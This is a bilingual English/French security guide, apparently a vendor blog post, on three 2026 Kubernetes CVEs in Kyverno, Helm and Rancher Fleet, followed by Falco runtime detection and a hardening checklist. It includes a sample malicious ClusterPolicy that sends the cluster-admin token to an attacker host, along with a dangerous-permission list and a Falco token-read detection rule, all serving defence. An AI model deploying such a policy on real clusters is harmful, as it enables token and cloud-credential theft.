In 2026, Kubernetes clusters are being compromised not through brute-force attacks on the API server, but through the tools teams trust most: admission controllers, Helm package managers, and the security policies meant to protect them. CVE-2026-41323 demonstrates this perfectly — Kyverno's policy engine, installed specifically to enforce security, was leaking cluster-admin ServiceAccount tokens to any URL an attacker could slip into a ClusterPolicy definition.

En 2026, les clusters Kubernetes sont compromis non pas par des attaques en force brute sur l'API server, mais via les outils auxquels les équipes font le plus confiance : les admission controllers, les gestionnaires de packages Helm, et les politiques de sécurité censées les protéger. CVE-2026-41323 l'illustre parfaitement — le moteur de politiques Kyverno, installé spécifiquement pour appliquer la sécurité, divulguait des tokens ServiceAccount cluster-admin vers n'importe quelle URL qu'un attaquant pouvait glisser dans une définition de ClusterPolicy.

This guide covers the three critical CVEs reshaping Kubernetes security in 2026 — CVE-2026-41323 (Kyverno token leak), CVE-2026-35206 (Helm path traversal), and CVE-2026-41050 (Fleet cluster-admin bypass) — alongside the statistical reality that 93% of organizations running Kubernetes suffered a security incident in the past year. We also provide a complete runtime security setup with Falco and eBPF to detect threats that static policies miss entirely.

Ce guide couvre les trois CVE critiques qui redessinent la sécurité Kubernetes en 2026 — CVE-2026-41323 (fuite de token Kyverno), CVE-2026-35206 (path traversal Helm), et CVE-2026-41050 (bypass cluster-admin Fleet) — ainsi que la réalité statistique : 93% des organisations utilisant Kubernetes ont subi un incident sécurité l'année passée. Nous fournissons également une configuration complète de sécurité runtime avec Falco et eBPF pour détecter les menaces que les politiques statiques manquent entièrement.

93%
Organizations that suffered a K8s security incident in 2025–2026
Organisations ayant subi un incident sécurité K8s en 2025–2026
Source: CNCF annual survey, 2026
50%
Of K8s clusters run at least one unsupported cluster version
Des clusters K8s tournent sur au moins une version non supportée
Source: CNCF annual survey, 2026
69
Public Helm charts requesting root-equivalent permissions
Charts Helm publics demandant des permissions équivalentes root
Source: Medium / Helm security research, 2026
80%+
MTTR reduction for security incidents with Falco + eBPF runtime detection
Réduction du MTTR des incidents sécurité avec Falco + détection eBPF runtime
Source: HAMS Tech / CNCF Falco project, 2026

CVE-2026-41323: Kyverno Leaks Cluster-Admin Tokens to Arbitrary URLs

CVE-2026-41323 : Kyverno Divulgue des Tokens Cluster-Admin vers des URLs Arbitraires

Kyverno is one of the most widely deployed admission controllers in production Kubernetes clusters, used to enforce security policies without writing custom webhooks. CVE-2026-41323 (CVSS 8.1, High) reveals a fundamental trust boundary violation: the apiCall feature in ClusterPolicy definitions automatically attaches the admission controller's ServiceAccount token to every outgoing HTTP request — with no URL validation whatsoever.

Kyverno est l'un des admission controllers les plus déployés dans les clusters Kubernetes de production, utilisé pour appliquer des politiques de sécurité sans écrire de webhooks personnalisés. CVE-2026-41323 (CVSS 8.1, High) révèle une violation fondamentale des frontières de confiance : la fonctionnalité apiCall dans les définitions ClusterPolicy attache automatiquement le token ServiceAccount de l'admission controller à chaque requête HTTP sortante — sans aucune validation d'URL.

# Malicious ClusterPolicy exploiting CVE-2026-41323
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: validate-pods
spec:
  rules:
    - name: check-pod-labels
      context:
        - name: externalData
          apiCall:
            # Attacker-controlled URL receives the cluster-admin SA token
            urlPath: "https://attacker.example.com/steal-token"
# The SA token is also sent to: http://169.254.169.254/latest/meta-data/
# → IAM credential theft on EKS, GKE, AKS cloud clusters

The impact is severe: Kyverno's admission controller ServiceAccount has patch permissions on webhook configurations. A stolen token means an attacker can modify admission webhook definitions — effectively disabling all security policies and gaining unrestricted access to the cluster. On cloud-hosted Kubernetes (EKS, GKE, AKS), the token is also forwarded to the instance metadata endpoint http://169.254.169.254/latest/meta-data/, leaking cloud IAM credentials and enabling lateral movement into the cloud account itself.

L'impact est sévère : le ServiceAccount de l'admission controller Kyverno possède des permissions patch sur les configurations webhook. Un token volé signifie qu'un attaquant peut modifier les définitions d'admission webhook — désactivant effectivement toutes les politiques de sécurité et obtenant un accès illimité au cluster. Sur Kubernetes hébergé dans le cloud (EKS, GKE, AKS), le token est également transmis vers l'endpoint de métadonnées de l'instance http://169.254.169.254/latest/meta-data/, divulguant les credentials IAM cloud et permettant un mouvement latéral vers le compte cloud lui-même.

Who is affected? Any cluster running Kyverno prior to versions 1.16.4, 1.17.2-rc1, or 1.18.0-rc1 and using the apiCall feature with external service URLs in ClusterPolicy definitions. The attack requires ClusterPolicy write access — achievable through a compromised CI/CD pipeline, a malicious Helm chart, or a developer with overly broad RBAC permissions.

Qui est affecté ? Tout cluster exécutant Kyverno antérieur aux versions 1.16.4, 1.17.2-rc1 ou 1.18.0-rc1 et utilisant la fonctionnalité apiCall avec des URLs de services externes dans les définitions ClusterPolicy. L'attaque nécessite un accès en écriture à ClusterPolicy — réalisable via un pipeline CI/CD compromis, un chart Helm malveillant, ou un développeur avec des permissions RBAC trop larges.

✓ Fix: Upgrade Kyverno to 1.16.4+, 1.17.2+, or 1.18.0+
✓ Correctif : Mettre à jour Kyverno vers 1.16.4+, 1.17.2+, ou 1.18.0+
Patched versions add URL allowlist enforcement and scheme checking for apiCall blocks. Rotate all ServiceAccount tokens immediately after upgrading if your cluster was running a vulnerable version.
Les versions corrigées ajoutent l'application d'une liste blanche d'URLs et la vérification de schéma pour les blocs apiCall. Faites tourner immédiatement tous les tokens ServiceAccount après la mise à jour si votre cluster tournait sur une version vulnérable.

CVE-2026-35206: Helm Path Traversal — Crafted Charts Write Outside Target Directories

CVE-2026-35206 : Path Traversal Helm — Des Charts Craftés Écrivent Hors des Répertoires Cibles

Helm is the de facto package manager for Kubernetes, used to deploy and manage applications across millions of clusters. CVE-2026-35206 affects helm pull --untar in all Helm versions up to and including 3.20.1 (v3 line) and 4.1.3 (v4 line). A specially crafted chart with a dot-segment name — "." or ".." — causes Helm to write chart contents directly to the --destination or current working directory, rather than creating the expected subdirectory.

Helm est le gestionnaire de packages de facto pour Kubernetes, utilisé pour déployer et gérer des applications sur des millions de clusters. CVE-2026-35206 affecte helm pull --untar dans toutes les versions Helm jusqu'à 3.20.1 (ligne v3) et 4.1.3 (ligne v4) incluses. Un chart spécialement crafté avec un nom segment-point — "." ou ".." — amène Helm à écrire le contenu du chart directement dans le répertoire --destination ou le répertoire de travail courant, plutôt que de créer le sous-répertoire attendu.

In CI/CD pipelines and GitOps workflows, helm pull --untar is routinely executed against third-party charts from artifact repositories. If the chart originates from a compromised upstream repository, a public Helm chart with a malicious version bump, or a supply chain attack targeting ArtifactHub, the vulnerability allows overwriting configuration files, CI scripts, or deployment manifests — without any explicit directory traversal sequences in the path.

Dans les pipelines CI/CD et les flux GitOps, helm pull --untar est exécuté routinièrement contre des charts tiers depuis des dépôts d'artefacts. Si le chart provient d'un dépôt upstream compromis, d'un chart Helm public avec une version malveillante, ou d'une attaque supply chain ciblant ArtifactHub, la vulnérabilité permet d'écraser des fichiers de configuration, des scripts CI, ou des manifestes de déploiement — sans séquences de traversal de répertoire explicites dans le chemin.

# Check your Helm version (upgrade if <= 3.20.1 or <= 4.1.3)
$ helm version
# Helm v3 — upgrade to 3.20.2+
$ curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash
# Or via package manager
$ brew upgrade helm # macOS
$ choco upgrade kubernetes-helm # Windows
# In CI/CD: pin the Helm version explicitly
$ curl -sSL https://get.helm.sh/helm-v3.20.2-linux-amd64.tar.gz | tar xz

The fix in Helm 3.20.2 and 4.1.4 adds explicit validation at both the metadata validation layer (metadata.go) and the expansion utility (expand.go) to reject chart names that are POSIX dot-segments or contain path separators. This defense-in-depth approach ensures no single bypass can re-introduce the vulnerability.

Le correctif dans Helm 3.20.2 et 4.1.4 ajoute une validation explicite à la fois dans la couche de validation des métadonnées (metadata.go) et l'utilitaire d'expansion (expand.go) pour rejeter les noms de chart qui sont des segments-points POSIX ou contiennent des séparateurs de chemin. Cette approche de défense en profondeur garantit qu'aucun bypass unique ne peut réintroduire la vulnérabilité.

CVE-2026-41050: Fleet Helm Deployer Retains cluster-admin During Template Rendering

CVE-2026-41050 : Le Déployeur Helm Fleet Conserve cluster-admin Lors du Rendu de Templates

CVE-2026-41050 affects Rancher Fleet's Helm deployer — a multi-cluster GitOps tool used in enterprise Kubernetes environments. The vulnerability: Fleet did not properly apply ServiceAccount impersonation in two specific code paths during Helm template rendering. A tenant with only git push access could cause cluster-admin privileges to be used when Helm processes templates on their behalf, bypassing the multi-tenancy isolation that Fleet is specifically designed to enforce.

CVE-2026-41050 affecte le déployeur Helm de Rancher Fleet — un outil GitOps multi-cluster utilisé dans les environnements Kubernetes d'entreprise. La vulnérabilité : Fleet n'appliquait pas correctement l'usurpation de ServiceAccount dans deux chemins de code spécifiques lors du rendu des templates Helm. Un tenant avec seulement un accès git push pouvait provoquer l'utilisation de privilèges cluster-admin lorsque Helm traitait des templates en son nom, contournant l'isolation multi-tenant que Fleet est spécifiquement conçu pour appliquer.

This is a privilege escalation through trust — the attacker doesn't need to bypass authentication, they need only push a crafted Helm template to a repository Fleet is watching. In shared cluster environments, this translates to complete cluster control from a low-privileged tenant account.

Il s'agit d'une escalade de privilèges par la confiance — l'attaquant n'a pas besoin de contourner l'authentification, il doit seulement pousser un template Helm crafté vers un dépôt surveillé par Fleet. Dans les environnements de cluster partagés, cela se traduit par un contrôle total du cluster depuis un compte tenant peu privilégié.

CVE Component CVSS Impact Fixed In
CVE Composant CVSS Impact Corrigé dans
CVE-2026-41323 Kyverno 8.1 High SA token leak → cluster takeover + cloud IAM exfiltration Fuite token SA → prise de cluster + exfiltration IAM cloud 1.16.4 / 1.17.2 / 1.18.0
CVE-2026-35206 Helm High Path traversal via crafted chart names in helm pull --untar Path traversal via noms de chart craftés dans helm pull --untar 3.20.2 / 4.1.4
CVE-2026-41050 Rancher Fleet High cluster-admin retained during Helm template rendering for low-priv tenants cluster-admin conservé lors du rendu Helm pour les tenants peu privilégiés Rancher Fleet patch

The Helm Chart Supply Chain Problem: 69 Public Charts with Root-Equivalent Access

Le Problème Supply Chain Helm : 69 Charts Publics avec Accès Équivalent Root

Beyond CVEs in Helm itself, a 2026 security research report revealed that 69 public Helm charts on ArtifactHub request a cluster-level read permission that can be exploited to gain root access to every pod in a cluster. The permission in question is get on nodes/proxy — technically "read-only" in the Kubernetes RBAC model, but in practice it forwards arbitrary requests to the kubelet API, bypassing normal authorization controls.

Au-delà des CVE dans Helm lui-même, un rapport de recherche sécurité 2026 a révélé que 69 charts Helm publics sur ArtifactHub demandent une permission de lecture au niveau du cluster qui peut être exploitée pour obtenir un accès root à chaque pod d'un cluster. La permission en question est get sur nodes/proxy — techniquement “lecture seule” dans le modèle RBAC Kubernetes, mais en pratique elle transmet des requêtes arbitraires à l'API kubelet, contournant les contrôles d'autorisation normaux.

This represents a systemic supply chain risk: organizations install these charts from trusted repositories as part of their standard platform setup — monitoring stacks, ingress controllers, GitOps agents — without auditing the RBAC permissions they request. The charts are not malicious, but their permission footprint creates a lateral movement path that attackers can exploit after compromising the application running inside.

Cela représente un risque supply chain systémique : les organisations installent ces charts depuis des dépôts de confiance dans le cadre de leur configuration de plateforme standard — stacks de monitoring, ingress controllers, agents GitOps — sans auditer les permissions RBAC qu'ils demandent. Les charts ne sont pas malveillants, mais leur empreinte de permissions crée un chemin de mouvement latéral que les attaquants peuvent exploiter après avoir compromis l'application s'exécutant à l'intérieur.

# Audit Helm chart RBAC before installing — check for dangerous permissions
$ helm show values <chart> | grep -i rbac
$ helm template <release> <chart> | grep -A5 "ClusterRole\|nodes/proxy\|secrets"
# Dangerous permissions to watch for:
- resources: ["nodes/proxy"] # → root kubelet access
- resources: ["secrets"] verbs: ["*"] # → all secrets readable
- resources: ["pods/exec"] # → shell in any pod
- clusterRoleBinding + cluster-admin # → full cluster control

Falco & eBPF: Runtime Security That Detects What Static Policies Miss

Falco & eBPF : Sécurité Runtime qui Détecte Ce que les Politiques Statiques Manquent

Admission controllers like Kyverno and OPA Gatekeeper are essential, but they only operate at the moment a resource is created or modified. Once a workload is running, they are blind. This is where Falco — a CNCF-graduated runtime security project adopted in production by Shopify, GitLab, and Skyscanner — fills the gap. Falco uses eBPF (requiring kernel 5.8+) to tap into Linux system calls in real time, detecting malicious behavior as it happens rather than before it starts.

Les admission controllers comme Kyverno et OPA Gatekeeper sont essentiels, mais ils n'opèrent qu'au moment où une ressource est créée ou modifiée. Une fois qu'un workload s'exécute, ils sont aveugles. C'est là que Falco — un projet de sécurité runtime diplômé CNCF adopté en production par Shopify, GitLab et Skyscanner — comble le vide. Falco utilise eBPF (nécessitant le kernel 5.8+) pour intercepter les appels système Linux en temps réel, détectant le comportement malveillant au moment où il se produit plutôt qu'avant qu'il ne commence.

# Install Falco via Helm (eBPF driver — no kernel module needed)
$ helm repo add falcosecurity https://falcosecurity.github.io/charts
$ helm repo update
$ helm install falco falcosecurity/falco \
    --namespace falco --create-namespace \
    --set driver.kind=ebpf \
    --set falcosidekick.enabled=true \
    --set falcosidekick.config.slack.webhookurl="https://hooks.slack.com/..."
# Verify Falco is running as a DaemonSet on all nodes
$ kubectl get pods -n falco -o wide

Falco's default ruleset detects the most common Kubernetes attack patterns out of the box: containers spawning unexpected shells (shell in a container), privilege escalation attempts via setuid binaries, processes reading sensitive files like /etc/shadow or Kubernetes ServiceAccount tokens, and unexpected network connections to external services. Each of these detection rules maps directly to the attack patterns seen in the 2026 CVEs above.

L'ensemble de règles par défaut de Falco détecte les patterns d'attaque Kubernetes les plus courants hors de la boîte : des containers ouvrant des shells inattendus (shell in a container), des tentatives d'escalade de privilèges via des binaires setuid, des processus lisant des fichiers sensibles comme /etc/shadow ou les tokens ServiceAccount Kubernetes, et des connexions réseau inattendues vers des services externes. Chacune de ces règles de détection correspond directement aux patterns d'attaque vus dans les CVE 2026 ci-dessus.

# Custom Falco rule: detect ServiceAccount token reads from unexpected processes
- rule: ServiceAccount Token Read Outside Kyverno
  desc: Alert on any process reading SA tokens that isn't the admission controller
  condition: >
    open_read and
    fd.name startswith "/var/run/secrets/kubernetes.io/serviceaccount" and
    not proc.name in (kyverno, controller-manager, kubectl)
  output: >
    SA token accessed (proc=%proc.name pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: WARNING
  tags: [kubernetes, token, supply-chain]

Kubernetes & Helm Security Hardening Checklist for 2026

Checklist de Durcissement Sécurité Kubernetes & Helm pour 2026

The 93% incident rate and 55% misconfiguration-as-top-concern statistics confirm that Kubernetes security failures are systematic, not random. Below is a prioritized hardening checklist addressing the specific attack surfaces exposed by the 2026 CVEs and supply chain research.

Le taux d'incident de 93% et les statistiques de 55% “configurations incorrectes comme principale préoccupation” confirment que les échecs de sécurité Kubernetes sont systématiques, pas aléatoires. Voici une checklist de durcissement priorisée adressant les surfaces d'attaque spécifiques exposées par les CVE 2026 et la recherche sur la supply chain.

1. Admission Controllers & Policy Engines
1. Admission Controllers & Moteurs de Politiques
  • Upgrade Kyverno to 1.16.4+, 1.17.2+, or 1.18.0+ immediately (CVE-2026-41323)
  • Mettre à jour Kyverno vers 1.16.4+, 1.17.2+, ou 1.18.0+ immédiatement (CVE-2026-41323)
  • Audit all ClusterPolicy apiCall blocks — restrict urlPath to known internal Kubernetes API paths
  • Auditer tous les blocs apiCall ClusterPolicy — restreindre urlPath aux chemins API Kubernetes internes connus
  • Add allowlist-based URL validation for any policy engine using external HTTP calls
  • Ajouter une validation d'URL basée sur liste blanche pour tout moteur de politiques utilisant des appels HTTP externes
  • Rotate ServiceAccount tokens on all admission controllers after any suspected compromise
  • Faire tourner les tokens ServiceAccount sur tous les admission controllers après toute compromission suspectée
2. Helm Version & Chart Integrity
2. Version Helm & Intégrité des Charts
  • Upgrade to Helm 3.20.2+ (v3) or 4.1.4+ (v4) to patch CVE-2026-35206
  • Mettre à jour vers Helm 3.20.2+ (v3) ou 4.1.4+ (v4) pour corriger CVE-2026-35206
  • Pin Helm version explicitly in every CI/CD job — never use latest tag
  • Pincer la version Helm explicitement dans chaque job CI/CD — ne jamais utiliser le tag latest
  • Verify chart provenance with helm verify and GPG signatures for charts from ArtifactHub
  • Vérifier la provenance des charts avec helm verify et les signatures GPG pour les charts depuis ArtifactHub
  • Use helm template to review RBAC resources before helm install — block nodes/proxy permission grants
  • Utiliser helm template pour examiner les ressources RBAC avant helm install — bloquer les octrois de permission nodes/proxy
  • Scan chart dependencies with trivy config <chart-dir> for known misconfigurations and CVEs
  • Scanner les dépendances des charts avec trivy config <chart-dir> pour les mauvaises configurations et CVE connues
3. RBAC Minimization (93% Have Overprivileged SAs)
3. Minimisation RBAC (93% ont des SA trop privilégiés)
  • Audit all ClusterRoleBindings and RoleBindings: kubectl get clusterrolebindings -o wide | grep cluster-admin
  • Auditer tous les ClusterRoleBindings et RoleBindings : kubectl get clusterrolebindings -o wide | grep cluster-admin
  • Disable automounting of ServiceAccount tokens for pods that don't need API access: automountServiceAccountToken: false
  • Désactiver le montage automatique des tokens ServiceAccount pour les pods qui n'ont pas besoin d'accès API : automountServiceAccountToken: false
  • Use namespace-scoped Roles instead of ClusterRoles wherever possible
  • Utiliser des Roles limités aux namespaces plutôt que des ClusterRoles partout où c'est possible
  • Run kubectl-who-can or Kube-bench to audit who can reach sensitive resources
  • Exécuter kubectl-who-can ou Kube-bench pour auditer qui peut accéder aux ressources sensibles
4. Runtime Security with Falco
4. Sécurité Runtime avec Falco
  • Deploy Falco as a DaemonSet with the eBPF driver (kernel 5.8+ required)
  • Déployer Falco comme DaemonSet avec le pilote eBPF (kernel 5.8+ requis)
  • Enable falcosidekick to route alerts to Slack, PagerDuty, or your SIEM
  • Activer falcosidekick pour router les alertes vers Slack, PagerDuty ou votre SIEM
  • Add custom rules for ServiceAccount token reads, unexpected curl/wget in containers, and kubectl exec on sensitive namespaces
  • Ajouter des règles personnalisées pour les lectures de tokens SA, les curl/wget inattendus dans les containers, et les kubectl exec sur les namespaces sensibles
  • Use Falco + Tetragon (Cilium) for kernel-level network policy enforcement alongside syscall detection
  • Utiliser Falco + Tetragon (Cilium) pour l'application de politiques réseau au niveau kernel en complément de la détection des syscalls

The Unsupported Version Problem: 50% of Clusters Are Running End-of-Life Kubernetes

Le Problème des Versions Non Supportées : 50% des Clusters Tournent sur Kubernetes en Fin de Vie

The CNCF's 2026 survey finding that 50% of organizations run at least one unsupported Kubernetes cluster version is alarming in context: unsupported versions don't receive security patches. CVE-2026-35206 in Helm is a perfect example — the fix requires updating Helm, but running an ancient Kubernetes version often means running an ancient Helm version too, since they're frequently bundled in managed Kubernetes distributions. Upgrade paths are blocked by deprecated APIs removed in newer Kubernetes releases, creating a compounding risk.

La constatation du sondage CNCF 2026 que 50% des organisations font tourner au moins une version Kubernetes non supportée est alarmante dans ce contexte : les versions non supportées ne reçoivent pas de correctifs de sécurité. CVE-2026-35206 dans Helm en est un exemple parfait — le correctif nécessite la mise à jour de Helm, mais tourner sur une ancienne version Kubernetes signifie souvent tourner sur une ancienne version Helm aussi, car ils sont souvent groupés dans les distributions Kubernetes gérées. Les chemins de mise à jour sont bloqués par des APIs dépréciées supprimées dans les nouvelles versions Kubernetes, créant un risque composé.

Kubernetes currently supports the three most recent minor releases. As of May 2026, that means clusters must be running at minimum Kubernetes 1.29 to receive security patches. Use kubectl version --short and compare against the official release schedule at kubernetes.io/releases. For managed clusters (EKS, GKE, AKS), enable automatic node group upgrades during maintenance windows.

Kubernetes supporte actuellement les trois dernières versions mineures. En mai 2026, cela signifie que les clusters doivent tourner au minimum sur Kubernetes 1.29 pour recevoir des correctifs de sécurité. Utilisez kubectl version --short et comparez avec le calendrier officiel des releases sur kubernetes.io/releases. Pour les clusters gérés (EKS, GKE, AKS), activez les mises à jour automatiques des groupes de nœuds pendant les fenêtres de maintenance.

Frequently Asked Questions

Questions fréquentes

Is CVE-2026-41323 exploitable without admin access to the cluster?

CVE-2026-41323 est-elle exploitable sans accès admin au cluster ?

Yes. The exploit requires ClusterPolicy write access, not cluster-admin. In many organizations, developers, SRE teams, or CI/CD service accounts have ClusterPolicy write rights as part of GitOps workflows — because creating and modifying security policies is seen as a development activity. If a CI/CD pipeline is compromised (e.g., via a supply chain attack on a GitHub Actions runner), an attacker can create a malicious ClusterPolicy and steal the Kyverno ServiceAccount token without ever needing direct Kubernetes admin credentials.

Oui. L'exploit nécessite un accès en écriture à ClusterPolicy, pas cluster-admin. Dans de nombreuses organisations, les développeurs, les équipes SRE ou les comptes de service CI/CD ont des droits d'écriture ClusterPolicy dans le cadre des flux GitOps — car créer et modifier des politiques de sécurité est considéré comme une activité de développement. Si un pipeline CI/CD est compromis (par exemple via une attaque supply chain sur un runner GitHub Actions), un attaquant peut créer une ClusterPolicy malveillante et voler le token ServiceAccount Kyverno sans jamais avoir besoin de credentials admin Kubernetes directs.

How do I check if a Helm chart exploits CVE-2026-35206?

Comment vérifier si un chart Helm exploite CVE-2026-35206 ?

CVE-2026-35206 is exploited via the chart's declared name in Chart.yaml, not through the chart content itself. You can inspect it before extracting: helm show chart <repo>/<chart> and check that the name field is not ".", "..", or contains path separators. Additionally, using Helm 3.20.2+ or 4.1.4+ adds server-side validation that rejects malicious chart names automatically, so upgrading Helm is the most robust mitigation.

CVE-2026-35206 est exploitée via le nom déclaré du chart dans Chart.yaml, pas à travers le contenu du chart lui-même. Vous pouvez l'inspecter avant l'extraction : helm show chart <repo>/<chart> et vérifier que le champ name n'est pas ".", "..", ou ne contient pas de séparateurs de chemin. De plus, utiliser Helm 3.20.2+ ou 4.1.4+ ajoute une validation côté serveur qui rejette automatiquement les noms de chart malveillants, donc mettre à jour Helm est la mitigation la plus robuste.

Does Falco work with managed Kubernetes (EKS, GKE, AKS)?

Falco fonctionne-t-il avec Kubernetes géré (EKS, GKE, AKS) ?

Yes. Falco supports all major managed Kubernetes providers using the eBPF driver, which doesn't require loading a kernel module — eliminating the main deployment obstacle in managed environments where kernel module loading is restricted. On EKS, ensure nodes use Amazon Linux 2023 or Ubuntu 20.04+ to meet the kernel 5.8 requirement. GKE's Container-Optimized OS (COS) supports Falco via eBPF from GKE 1.26+. AKS supports Falco on Ubuntu node pools out of the box.

Oui. Falco supporte tous les principaux fournisseurs Kubernetes gérés en utilisant le pilote eBPF, qui ne nécessite pas de charger un module kernel — éliminant le principal obstacle de déploiement dans les environnements gérés où le chargement de modules kernel est restreint. Sur EKS, assurez-vous que les nœuds utilisent Amazon Linux 2023 ou Ubuntu 20.04+ pour satisfaire l'exigence kernel 5.8. Le Container-Optimized OS (COS) de GKE supporte Falco via eBPF depuis GKE 1.26+. AKS supporte Falco sur les node pools Ubuntu hors de la boîte.

What's the difference between Kyverno and OPA Gatekeeper for security policy enforcement?

Quelle est la différence entre Kyverno et OPA Gatekeeper pour l'application des politiques de sécurité ?

Both are CNCF admission controllers. Kyverno uses YAML-native policy definitions (easier for platform teams without Rego experience) and supports mutation, validation, and generation. OPA Gatekeeper uses Rego policy language (more powerful, steeper learning curve) and is better suited for complex logical conditions. From a security standpoint, CVE-2026-41323 affects only Kyverno's apiCall feature — OPA Gatekeeper does not have an equivalent external HTTP call mechanism. If you use Kyverno's apiCall extensively, Gatekeeper is worth evaluating as an alternative for those specific policies.

Les deux sont des admission controllers CNCF. Kyverno utilise des définitions de politiques natives YAML (plus facile pour les équipes plateforme sans expérience Rego) et supporte la mutation, la validation et la génération. OPA Gatekeeper utilise le langage de politique Rego (plus puissant, courbe d'apprentissage plus abrupte) et est mieux adapté aux conditions logiques complexes. Du point de vue sécurité, CVE-2026-41323 n'affecte que la fonctionnalité apiCall de Kyverno — OPA Gatekeeper n'a pas de mécanisme équivalent d'appel HTTP externe. Si vous utilisez extensivement l'apiCall de Kyverno, Gatekeeper vaut la peine d'être évalué comme alternative pour ces politiques spécifiques.

Should I lock my Helm chart dependencies in CI/CD?

Dois-je verrouiller mes dépendances de charts Helm en CI/CD ?

Yes, always. Use helm dependency update to generate a Chart.lock file that pins exact chart versions and their SHA256 digests. Commit Chart.lock to your repository and use helm dependency build (not update) in CI to verify that chart digests match. This prevents a compromised upstream chart repository from silently swapping in a malicious chart version — the same supply chain risk that led to CVE-2026-35206 being a meaningful threat vector.

Oui, toujours. Utilisez helm dependency update pour générer un fichier Chart.lock qui épine les versions exactes des charts et leurs digests SHA256. Committez Chart.lock dans votre dépôt et utilisez helm dependency build (pas update) en CI pour vérifier que les digests des charts correspondent. Cela empêche un dépôt de charts upstream compromis de remplacer silencieusement une version de chart malveillante — le même risque supply chain qui fait de CVE-2026-35206 un vecteur de menace significatif.

Monitor Your Kubernetes Dependencies Automatically

Surveillez Vos Dépendances Kubernetes Automatiquement

CVE OptiBot scans your Helm Chart.lock files, container image digests, and Kubernetes operator dependencies daily — alerting you the moment a CVE like CVE-2026-41323 or CVE-2026-35206 affects your stack, before it reaches production.

CVE OptiBot scanne vos fichiers Helm Chart.lock, les digests d'images containers, et les dépendances des opérateurs Kubernetes chaque jour — vous alertant dès qu'une CVE comme CVE-2026-41323 ou CVE-2026-35206 affecte votre stack, avant qu'elle n'atteigne la production.

Start free monitoring Démarrer le monitoring gratuit
CVE Monitoring → Monitoring CVE → Docker Container Security 2026 → Sécurité Containers Docker 2026 → GitHub Actions OIDC Token Security 2026 → Sécurité Tokens OIDC GitHub Actions 2026 → Dependabot Security Alerts 2026 → Alertes Sécurité Dependabot 2026 →